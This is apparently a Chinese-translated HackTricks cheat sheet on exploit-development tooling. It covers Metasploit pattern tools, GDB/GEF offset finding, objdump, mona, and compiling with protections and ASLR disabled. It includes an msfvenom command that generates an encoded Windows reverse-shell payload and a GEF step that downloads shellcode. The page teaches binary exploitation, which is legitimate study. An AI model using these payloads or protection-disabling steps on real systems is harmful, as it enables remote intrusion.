☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

- 你在一家**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！ - 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family) - 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) - **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

# Metasploit ``` pattern_create.rb -l 3000 #Length pattern_offset.rb -l 3000 -q 5f97d534 #Search offset nasm_shell.rb nasm> jmp esp #Get opcodes msfelfscan -j esi /opt/fusion/bin/level01 ``` ## Shellcodes Shellcode是一段用于利用软件漏洞的机器码。它通常用于利用缓冲区溢出等漏洞，以在目标系统上执行恶意代码。Shellcode的目标是获取系统访问权限，从而使黑客能够执行各种操作，如远程控制、文件访问和系统信息收集。 Shellcode通常以二进制形式存在，并且必须与特定的操作系统和架构兼容。因此，编写Shellcode时需要考虑目标系统的操作系统类型（如Windows、Linux或macOS）和架构（如x86、x64或ARM）。 Shellcode的编写可以使用汇编语言或高级语言（如C或C++）。一些常见的Shellcode编写工具包括NASM、GCC和LLVM。 在利用漏洞时，Shellcode通常通过将其注入到受攻击的程序中来执行。这可以通过多种方式实现，如利用缓冲区溢出、格式化字符串漏洞或使用特定的漏洞利用工具。 Shellcode的编写是黑客和安全研究人员的重要技能之一。了解Shellcode的工作原理和编写方法可以帮助他们更好地理解和防御各种漏洞攻击。 ``` msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c ``` # GDB ## 安装 To install GDB, you can use the following command: ```bash sudo apt-get install gdb ``` Once the installation is complete, you can verify the installation by running the following command: ```bash gdb --version ``` This will display the version of GDB installed on your system. ``` apt-get install gdb ``` ## 参数 **-q** --> 不显示横幅\ **-x \** --> 从此处自动执行GDB指令\ **-p \** --> 附加到进程 ### 指令 \> **disassemble main** --> 反汇编函数\ \> **disassemble 0x12345678**\ \> **set disassembly-flavor intel**\ \> **set follow-fork-mode child/parent** --> 跟踪创建的进程\ \> **p system** --> 查找system函数的地址\ \> **help**\ \> **quit** \> **br func** --> 在函数中添加断点\ \> **br \*func+23**\ \> **br \*0x12345678**\ **> del NUM** --> 删除指定数量的断点\ \> **watch EXPRESSION** --> 如果值发生变化，则中断 **> run** --> 执行\ **> start** --> 在main函数中开始并中断\ \> **n/next** --> 执行下一条指令（不进入函数内部）\ \> **s/step** --> 执行下一条指令\ \> **c/continue** --> 继续执行直到下一个断点 \> **set $eip = 0x12345678** --> 更改$eip的值\ \> **info functions** --> 函数信息\ \> **info functions func** --> 函数的信息\ \> **info registers** --> 寄存器的值\ \> **bt** --> 栈\ \> **bt full** --> 详细的栈信息 \> **print variable**\ \> **print 0x87654321 - 0x12345678** --> 计算\ \> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> 以八进制/十六进制/十进制/二进制/指令/ASCII显示内容 * **x/o 0xDir\_hex** * **x/2x $eip** --> 从EIP中获取2个字 * **x/2x $eip -4** --> $eip - 4 * **x/8xb $eip** --> 8个字节（b-> 字节, h-> 2字节, w-> 4字节, g-> 8字节） * **i r eip** --> $eip的值 * **x/w pointer** --> 指针的值 * **x/s pointer** --> 指针指向的字符串 * **x/xw \&pointer** --> 指针所在的地址 * **x/i $eip** —> EIP的指令 ## [GEF](https://github.com/hugsy/gef) ```bash checksec #Check protections p system #Find system function address search-pattern "/bin/sh" #Search in the process memory vmmap #Get memory mappings #Shellcode shellcode search x86 #Search shellcodes shellcode get 61 #Download shellcode number 61 #Patterns pattern create 200 #Generate length 200 pattern pattern search "avaaawaa" #Search for the offset of that substring pattern search $rsp #Search the offset given the content of $rsp #Another way to get the offset of to the RIP 1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it 2- ef➤ i f Stack level 0, frame at 0x7fffffffddd0: rip = 0x400cd3; saved rip = 0x6261617762616176 called by frame at 0x7fffffffddd8 Arglist at 0x7fffffffdcf8, args: Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0 Saved registers: rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8 gef➤ pattern search 0x6261617762616176 [+] Searching for '0x6261617762616176' [+] Found at offset 184 (little-endian search) likely ``` ## 技巧 ### GDB相同的地址 在调试过程中，GDB的地址与执行二进制文件时使用的地址**略有不同**。您可以通过以下方式使GDB具有相同的地址： * `unset env LINES` * `unset env COLUMNS` * `set env _=` _将二进制文件的绝对路径放在这里_ * 使用相同的绝对路径利用二进制文件 * 在使用GDB和利用二进制文件时，`PWD`和`OLDPWD`必须相同 ### 回溯以查找调用的函数 当您有一个**静态链接的二进制文件**时，所有的函数都属于二进制文件（而不是外部库）。在这种情况下，很难**确定二进制文件遵循的流程，例如要求用户输入**。\ 您可以通过使用**gdb**运行二进制文件，直到要求输入时停止它，然后使用**`bt`**（**回溯**）命令查看调用的函数来轻松确定此流程： ``` gef➤ bt #0 0x00000000004498ae in ?? () #1 0x0000000000400b90 in ?? () #2 0x0000000000400c1d in ?? () #3 0x00000000004011a9 in ?? () #4 0x0000000000400a5a in ?? () ``` ## GDB服务器 `gdbserver --multi 0.0.0.0:23947`（在IDA中，您需要在Linux机器和Windows机器中填写可执行文件的绝对路径） # Ghidra ## 查找堆栈偏移 **Ghidra**非常有用，可以通过有关本地变量位置的信息找到**缓冲区溢出的偏移量**。\ 例如，在下面的示例中，`local_bc`中的缓冲区溢出表示您需要一个偏移量为`0xbc`。此外，如果`local_10`是一个canary cookie，表示从`local_bc`覆盖它的偏移量为`0xac`。\ _请记住，RIP保存的第一个0x08属于RBP。_ .png>) # GCC **gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> 编译时去除保护\ **-o** --> 输出\ **-g** --> 保存代码（GDB将能够查看它）\ **echo 0 > /proc/sys/kernel/randomize\_va\_space** --> 在Linux中禁用ASLR **编译shellcode：**\ **nasm -f elf assembly.asm** --> 返回“.o”\ **ld assembly.o -o shellcodeout** --> 可执行文件 # Objdump **-d** --> 反汇编可执行文件的各个部分（查看编译后的shellcode的操作码，查找ROP Gadgets，查找函数地址...）\ **-Mintel** --> **Intel**语法\ **-t** --> **符号**表\ **-D** --> **反汇编全部**（静态变量的地址）\ **-s -j .dtors** --> dtors部分\ **-s -j .got** --> got部分\ \-D -s -j .plt --> **plt**部分**反编译**\ **-TR** --> **重定位**\ **ojdump -t --dynamic-relo ./exec | grep puts** --> 修改GOT中的"puts"的地址\ **objdump -D ./exec | grep "VAR\_NAME"** --> 静态变量的地址（这些存储在DATA部分）。 # Core dumps 1. 在启动程序之前运行`ulimit -c unlimited` 2. 运行`sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` 3. 运行`sudo gdb --core=\ --quiet` # 更多 **ldd executable | grep libc.so.6** --> 地址（如果启用ASLR，则每次都会更改）\ **for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> 循环查看地址是否经常更改\ **readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> "system"的偏移量\ **strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> "/bin/sh"的偏移量 **strace executable** --> 可执行文件调用的函数\ **rabin2 -i ejecutable -->** 所有函数的地址 # **Inmunity debugger** ```bash !mona modules #Get protections, look for all false except last one (Dll of SO) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) ``` # IDA ## 在远程 Linux 上进行调试 在 IDA 文件夹中，您可以找到用于在 Linux 上调试二进制文件的可执行文件。要这样做，请将 _linux\_server_ 或 _linux\_server64_ 可执行文件移动到 Linux 服务器中，并在包含二进制文件的文件夹中运行它： ``` ./linux_server64 -Ppass ``` 然后，配置调试器：调试器（远程Linux）-> 进程选项...： .png>)

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

- 你在一家**网络安全公司**工作吗？想要在HackTricks中看到你的**公司广告**吗？或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！ - 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family) - 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) - **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** - **通过向[hacktricks仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud仓库](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。